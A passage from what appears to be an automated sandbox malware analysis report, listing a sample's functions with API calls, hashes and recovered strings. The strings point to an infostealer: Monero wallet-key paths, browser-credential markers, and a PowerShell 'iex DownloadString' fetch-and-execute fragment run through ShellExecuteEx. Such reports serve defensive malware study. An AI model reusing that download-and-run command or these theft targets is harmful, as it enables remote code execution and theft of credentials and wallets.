                      • Instruction Fuzzy Hash: 134178B7D001086BDB15EBE0EC46FFE737EAB88300F448659B6155B1C1EA755B888B92
                      Function 003D99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                      • LocalFree.KERNEL32(003D148F), ref: 003D9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 1a00f7fb8ab58d710881978546cf6310ec2196c682bab6c52ecbf4d9b0ab2591
                      • Instruction ID: 5a03ce9dbf8e91a287869617ca5d353bd75e418ba8cdab558592e94933488404
                      • Opcode Fuzzy Hash: 1a00f7fb8ab58d710881978546cf6310ec2196c682bab6c52ecbf4d9b0ab2591
                      • Instruction Fuzzy Hash: 48314BB5A00209EFDB15CFA4D985BEE77B9FF48310F10815AE901A7390D774AA41CFA1
                      Function 003EC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      • Opcode ID: 26a7a40e04858f6d32b2f399cd1342553fe21e4fded067812f795cb431c03212
                      • Instruction ID: 968b3cfbd6ba474de7fd397cea65879531d9daa3e1ffca74db01647e299af126
                      • Opcode Fuzzy Hash: 26a7a40e04858f6d32b2f399cd1342553fe21e4fded067812f795cb431c03212
                      • Instruction Fuzzy Hash: 3A41F6711107AC9EDB228B258D84FFFBBEC9B45304F1455A8E98A861C3D3719A458F60
                      Function 003E4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcat.KERNEL32(?,0108E388), ref: 003E47DB
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4801
                      • lstrcat.KERNEL32(?,?), ref: 003E4820
                      • lstrcat.KERNEL32(?,?), ref: 003E4834
                      • lstrcat.KERNEL32(?,0107B7C8), ref: 003E4847
                      • lstrcat.KERNEL32(?,?), ref: 003E485B
                      • lstrcat.KERNEL32(?,0108D680), ref: 003E486F
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8D90: GetFileAttributesA.KERNEL32(00000000,?,003D1B54,?,?,003F564C,?,?,003F0E1F), ref: 003E8D9F
                        • Part of subcall function 003E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003E4580
                        • Part of subcall function 003E4570: RtlAllocateHeap.NTDLL(00000000), ref: 003E4587
                        • Part of subcall function 003E4570: wsprintfA.USER32 ref: 003E45A6
                        • Part of subcall function 003E4570: FindFirstFileA.KERNEL32(?,?), ref: 003E45BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 3e7a0a6fb50285e18c34ecc7cb8d6a32bde897f1420a3dee4bb030f4c9fd7855
                      • Instruction ID: 1d86b69245760540b0c38aa5591b5c98ba14792a6299e60903967a0ee84e4996
                      • Opcode Fuzzy Hash: 3e7a0a6fb50285e18c34ecc7cb8d6a32bde897f1420a3dee4bb030f4c9fd7855
                      • Instruction Fuzzy Hash: 473184B6D0021867CB11FBF0DC85EE9737DAB48700F444689B3199A1C2EE74A78ACB91
                      Function 003E2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003E2CC4
                      • ')", xrefs: 003E2CB3
                      • <, xrefs: 003E2D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003E2D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: dceff95c51653dc734970c75195890f4ca8d87d83dbbb87d2244483f90153ce1
                      • Instruction ID: b0599a89e479818025b7491be6f3b6d8c93f7ba0aeb1d9ffa9fd347cb1b31ebf
                      • Opcode Fuzzy Hash: dceff95c51653dc734970c75195890f4ca8d87d83dbbb87d2244483f90153ce1
                      • Instruction Fuzzy Hash: 2141E271C006589ADB1AFBA1C891BEDBB79AF10300F414219F106AA1D2DF747A4ADF91
                      Function 003D9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                      Download Yara Rule
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003D9F41
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 3a551bf44c460ae303a5472a580707f12f8ec0cbaae1f78b7af9a63987a722bd
                      • Instruction ID: 378054b5ed601596255ed98975e02f41b5d81c0c0ef4daadf1a0b65ce96c3705
                      • Opcode Fuzzy Hash: 3a551bf44c460ae303a5472a580707f12f8ec0cbaae1f78b7af9a63987a722bd
                      • Instruction Fuzzy Hash: 9F617E71A0024CEBDB25EFA4DD96FED7779AF40300F008118F90A5F285EB746A05CB52
                      Function 003E70D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • memset.MSVCRT ref: 003E716A
                      Strings
                      • s>, xrefs: 003E7111
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003E718C
                      • s>, xrefs: 003E72AE, 003E7179, 003E717C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpymemset
                      • String ID: s>$s>$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 4047604823-133744571
                      • Opcode ID: fd15c81c7e983ac0181c9368b194ee7c355d4f270654ea147a96f88eb0cd392c
                      • Instruction ID: a155d804cb58aa263b7c39cae2fe941a9a7090b8b2ec91e1bb8dbe6dc1b0b34e
                      • Opcode Fuzzy Hash: fd15c81c7e983ac0181c9368b194ee7c355d4f270654ea147a96f88eb0cd392c
                      • Instruction Fuzzy Hash: B15190B0C04269DBDB25EB91DC81BEEB374AF44304F1046A8E205772C2EB746E88CF55
                      Function 003E7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C038,00000000,00020119,?), ref: 003E7E5E
                      • RegQueryValueExA.ADVAPI32(?,0108D700,00000000,00000000,000000FF,000000FF), ref: 003E7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 003E7E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: a401a7aefe0ac1958e6f302849fcea6fa7c1245678fa5376fde910aa7fd0d9ab
                      • Instruction ID: 56a2595cbe0241b72ccd248a2f56edef0e74f46a0c6053514f44a03b69b08d3d
                      • Opcode Fuzzy Hash: a401a7aefe0ac1958e6f302849fcea6fa7c1245678fa5376fde910aa7fd0d9ab
                      • Instruction Fuzzy Hash: D2116AB1A44209EBDB11CBD5DD4AFBBBBB9EB44B10F10821AF605A7280D77459008BA1
                      Function 003E9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                      Download Yara Rule
                      APIs
                      • StrStrA.SHLWAPI(0108E028,?,?,?,003E140C,?,0108E028,00000000), ref: 003E926C
                      • lstrcpyn.KERNEL32(0061AB88,0108E028,0108E028,?,003E140C,?,0108E028), ref: 003E9290
                      • lstrlen.KERNEL32(?,?,003E140C,?,0108E028), ref: 003E92A7
                      • wsprintfA.USER32 ref: 003E92C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 507e533625c76f505010cbdf58d02e5a2ebd7474054d54f95f4d3e6c6a826192
                      • Instruction ID: 600778c21dba4afbbddcd45acb045c02cf37d2d8de60d8c443c8b0095340f5d9
                      • Opcode Fuzzy Hash: 507e533625c76f505010cbdf58d02e5a2ebd7474054d54f95f4d3e6c6a826192
                      • Instruction Fuzzy Hash: CD011A7550514CFFCB05DFECD998EEE7BBAEB48350F188548F9098B241C631AA40DB91
                      Function 003D12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003D12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003D12F5
                      • RegCloseKey.ADVAPI32(?), ref: 003D12FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: e43a2d61d4d49d4c15c8f42dfa34485584cde5aa8a4d5cd4f8d963db1bd5c03a
                      • Instruction ID: 624d941d90d3f16d8ca8083950249056967b664ed4669331ee0659065a695638
                      • Opcode Fuzzy Hash: e43a2d61d4d49d4c15c8f42dfa34485584cde5aa8a4d5cd4f8d963db1bd5c03a
                      • Instruction Fuzzy Hash: A801E1B9A40208BBDB04DFE4DC49FEEB7B9EB48701F14C15AFA0597280D6759A018F51
                      Function 003E6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003E6663
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E6726
                      • ExitProcess.KERNEL32 ref: 003E6755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
